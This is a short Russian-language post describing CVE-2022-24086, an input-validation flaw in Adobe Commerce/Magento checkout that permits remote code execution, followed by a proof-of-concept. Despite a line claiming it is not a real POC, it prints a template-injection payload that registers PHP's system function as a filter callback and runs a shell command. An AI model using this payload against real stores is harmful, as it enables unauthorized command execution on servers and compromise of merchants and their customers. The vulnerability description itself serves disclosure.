
CVE-2022-24086 о Magento RCE
CVE-2022-24086 о Magento RCE
Adobe Commerce версий 2.4.3-p1 (и более ранние) и 2.3.7-p2 (и более ранние) подвержены уязвимости некорректной проверки ввода во время процесса оформления заказа. Эксплуатация этой уязвимости не требует взаимодействия с пользователем и может привести к выполнению произвольного кода.
Внимание: Это не настоящий POC ...

POC
{{var this.getTemplateFilter().addAfterFilterCallback("system").filter("whoami")}}